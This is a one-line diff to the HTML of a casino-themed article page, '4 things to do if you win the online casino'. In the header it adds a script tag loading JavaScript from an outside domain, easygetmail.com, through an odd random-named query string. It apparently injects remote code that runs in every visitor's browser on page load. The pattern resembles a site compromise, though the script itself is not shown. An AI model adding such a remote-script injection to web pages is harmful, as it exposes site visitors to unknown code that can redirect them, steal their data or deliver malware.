--- a/4_things_to_do_if_you_win_the_online_casino/index.html
+++ b/4_things_to_do_if_you_win_the_online_casino/index.html
@@ -86,6 +86,7 @@
                 </form>
             </div>
         </div>
+        <script src="https://easygetmail.com/subscribe/?u7g9qpd2.js"></script>
     </header>
     <!-- End header Area -->
 
